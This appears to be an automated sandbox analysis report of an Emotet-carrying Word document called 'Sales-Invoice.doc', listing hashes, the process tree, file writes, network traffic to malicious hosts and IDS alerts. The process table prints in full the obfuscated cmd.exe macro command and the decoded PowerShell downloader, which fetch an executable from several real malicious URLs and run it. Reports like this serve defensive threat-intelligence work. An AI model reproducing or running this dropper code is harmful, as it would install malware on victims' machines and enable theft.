download: | Sales-Invoice |
Full analysis: | https://app.any.run/tasks/df147e73-869b-46df-8aad-9a7b266cf39a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 03:30:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 17:18:00 2018, Last Saved Time/Date: Thu Dec 13 17:18:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0 |
MD5: | B9A6E8F20C9DF0376DA473086B054C08 |
SHA1: | C9FD1F416B6B6B462C6220AE3B87EDE08163C423 |
SHA256: | 12CB92203CDAFE459DAD9E407B833EECAC7BB3AA32DA2A548EF2AE01484E58BF |
SSDEEP: | 1536:mqocn1kp59gxBK85fBnpx/7F+ze7UCQcYOA+a9:w41k/W487xFTYcYO |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:13 17:18:00 |
ModifyDate: | 2018:12:13 17:18:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 22 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 24 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2840 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4076 | c:\RsqPulGkozfJlI\AitkcCTV\YihOIAshi\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set CS5M=zYLOzXtEaAFqfvMXYzRmsb.@0'ndWighKwuVUr +,jT}y1S(;/NGQ)Ix=8l-\$5eJkBC{9o:pHcD&&for %Z in (61;72;12;42;56;25;72;41;8;25;48;61;36;11;13;56;26;63;33;59;70;21;41;63;74;6;38;50;63;6;22;28;63;21;67;58;29;63;26;6;48;61;41;42;64;56;25;31;6;6;72;71;49;49;27;63;20;29;30;26;74;58;70;34;27;29;26;74;22;74;70;19;49;10;58;58;32;41;7;8;23;31;6;6;72;71;49;49;29;30;58;70;70;74;33;65;22;74;70;19;22;21;37;49;64;42;63;62;3;23;31;6;6;72;71;49;49;58;63;20;8;19;29;20;27;63;19;70;58;63;26;27;70;20;8;65;70;19;21;29;22;74;27;49;31;2;23;31;6;6;72;71;49;49;19;63;6;6;22;74;70;19;22;34;8;49;66;21;23;31;6;6;72;71;49;49;33;33;33;22;44;70;58;74;34;29;26;20;8;8;6;65;63;20;8;26;22;74;70;19;49;52;67;42;11;25;22;46;72;58;29;6;47;25;23;25;53;48;61;66;18;28;56;25;35;11;26;25;48;61;27;46;73;38;56;38;25;69;45;24;25;48;61;35;34;52;56;25;52;73;7;25;48;61;72;52;18;56;61;63;26;13;71;6;63;19;72;39;25;60;25;39;61;27;46;73;39;25;22;63;55;63;25;48;12;70;37;63;8;74;31;47;61;33;8;11;38;29;26;38;61;41;42;64;53;68;6;37;44;68;61;36;11;13;22;75;70;33;26;58;70;8;27;10;29;58;63;47;61;33;8;11;40;38;61;72;52;18;53;48;61;75;29;16;56;25;41;12;28;25;48;54;12;38;47;47;51;63;6;59;54;6;63;19;38;61;72;52;18;53;22;58;63;26;30;6;31;38;59;30;63;38;57;24;24;24;24;53;38;68;54;26;13;70;65;63;59;54;6;63;19;38;61;72;52;18;48;61;74;31;72;56;25;32;73;33;25;48;21;37;63;8;65;48;43;43;74;8;6;74;31;68;43;43;61;50;2;41;56;25;51;14;33;25;48;77)do set JRh=!JRh!!CS5M:~%Z,1!&&if %Z gtr 76 powershell.exe "!JRh:~5!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2592 | CmD /V:O/C"set CS5M=zYLOzXtEaAFqfvMXYzRmsb.@0'ndWighKwuVUr +,jT}y1S(;/NGQ)Ix=8l-\$5eJkBC{9o:pHcD&&for %Z in (61;72;12;42;56;25;72;41;8;25;48;61;36;11;13;56;26;63;33;59;70;21;41;63;74;6;38;50;63;6;22;28;63;21;67;58;29;63;26;6;48;61;41;42;64;56;25;31;6;6;72;71;49;49;27;63;20;29;30;26;74;58;70;34;27;29;26;74;22;74;70;19;49;10;58;58;32;41;7;8;23;31;6;6;72;71;49;49;29;30;58;70;70;74;33;65;22;74;70;19;22;21;37;49;64;42;63;62;3;23;31;6;6;72;71;49;49;58;63;20;8;19;29;20;27;63;19;70;58;63;26;27;70;20;8;65;70;19;21;29;22;74;27;49;31;2;23;31;6;6;72;71;49;49;19;63;6;6;22;74;70;19;22;34;8;49;66;21;23;31;6;6;72;71;49;49;33;33;33;22;44;70;58;74;34;29;26;20;8;8;6;65;63;20;8;26;22;74;70;19;49;52;67;42;11;25;22;46;72;58;29;6;47;25;23;25;53;48;61;66;18;28;56;25;35;11;26;25;48;61;27;46;73;38;56;38;25;69;45;24;25;48;61;35;34;52;56;25;52;73;7;25;48;61;72;52;18;56;61;63;26;13;71;6;63;19;72;39;25;60;25;39;61;27;46;73;39;25;22;63;55;63;25;48;12;70;37;63;8;74;31;47;61;33;8;11;38;29;26;38;61;41;42;64;53;68;6;37;44;68;61;36;11;13;22;75;70;33;26;58;70;8;27;10;29;58;63;47;61;33;8;11;40;38;61;72;52;18;53;48;61;75;29;16;56;25;41;12;28;25;48;54;12;38;47;47;51;63;6;59;54;6;63;19;38;61;72;52;18;53;22;58;63;26;30;6;31;38;59;30;63;38;57;24;24;24;24;53;38;68;54;26;13;70;65;63;59;54;6;63;19;38;61;72;52;18;48;61;74;31;72;56;25;32;73;33;25;48;21;37;63;8;65;48;43;43;74;8;6;74;31;68;43;43;61;50;2;41;56;25;51;14;33;25;48;77)do set JRh=!JRh!!CS5M:~%Z,1!&&if %Z gtr 76 powershell.exe "!JRh:~5!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2484 | powershell.exe "$pfT='pja';$Uqv=new-object Net.WebClient;$jTJ='http://designcloudinc.com/FllKjEa@http://igloocwk.com.br/JTe5O@http://lesamisdemolendosakombi.cd/hL@http://mett.com.ua/Bb@http://www.yolcuinsaatkesan.com/QCTq'.Split('@');$BRW='Vqn';$dSH = '910';$VuQ='QHE';$pQR=$env:temp+'\'+$dSH+'.exe';foreach($waq in $jTJ){try{$Uqv.DownloadFile($waq, $pQR);$DiY='jfW';If ((Get-Item $pQR).length -ge 80000) {Invoke-Item $pQR;$chp='KHw';break;}}catch{}}$NLj='GMw';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3828 | "C:\Users\admin\AppData\Local\Temp\910.exe" | C:\Users\admin\AppData\Local\Temp\910.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3052 | "C:\Users\admin\AppData\Local\Temp\910.exe" | C:\Users\admin\AppData\Local\Temp\910.exe | 910.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
2560 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 910.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3260 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Version: 4.0.6304.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2840 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR962B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2840 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\112AF90F.wmf | — | |
MD5:— | SHA256:— | |||
2840 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9B4134F5.wmf | — | |
MD5:— | SHA256:— | |||
2484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MM8088LJ6ZE8JJZ1GU4Z.temp | — | |
MD5:— | SHA256:— | |||
2840 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:97134130F5D402DEF1A4F4D6C8F007FA | SHA256:5CD87DA05B66B14EE81C18E40F0A083053B878A7F3D82D5CF3212B25AF266A26 | |||
2484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a83c.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3052 | 910.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:63EE678E982937ECBCED5B8DC3BE6E4F | SHA256:6476739FB169087B297EF4F2E97CDEF8FC50DE188EDCD5E011E4E8A08B155956 | |||
2840 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50E19FC4.wmf | wmf | |
MD5:66EE9E00F010897904FB1339FAD6D170 | SHA256:155D7FD0FDD7534F43B00ADCA01024E971B9969C14B016B9A55CC177B528B336 | |||
2840 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBEE77C6.wmf | wmf | |
MD5:8EFD73A2D2896412A0458F04170E6820 | SHA256:4D0D4DF6F6DF070A040868C092024B39E1CD5C508F44A24005E996DB0E03BE03 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3260 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
2484 | powershell.exe | GET | 200 | 154.16.144.102:80 | http://lesamisdemolendosakombi.cd/hL/ | US | executable | 120 Kb | malicious |
3260 | archivesymbol.exe | GET | 200 | 186.136.68.246:80 | http://186.136.68.246/ | AR | binary | 132 b | malicious |
2484 | powershell.exe | GET | 404 | 75.119.206.34:80 | http://igloocwk.com.br/JTe5O | US | html | 322 b | malicious |
2484 | powershell.exe | GET | 301 | 154.16.144.102:80 | http://lesamisdemolendosakombi.cd/hL | US | html | 394 b | malicious |
2484 | powershell.exe | GET | 301 | 104.156.48.66:80 | http://designcloudinc.com/FllKjEa | US | html | 242 b | malicious |
2484 | powershell.exe | GET | 403 | 104.156.48.66:80 | http://designcloudinc.com/FllKjEa/ | US | html | 242 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3260 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
3260 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2484 | powershell.exe | 104.156.48.66:80 | designcloudinc.com | HIVELOCITY VENTURES CORP | US | malicious |
2484 | powershell.exe | 75.119.206.34:80 | igloocwk.com.br | New Dream Network, LLC | US | malicious |
2484 | powershell.exe | 154.16.144.102:80 | lesamisdemolendosakombi.cd | — | US | malicious |
Domain | IP | Reputation |
---|---|---|
designcloudinc.com |
| malicious |
igloocwk.com.br |
| malicious |
lesamisdemolendosakombi.cd |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2484 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2484 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2484 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2484 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2484 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2484 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3260 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3260 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3260 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3260 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |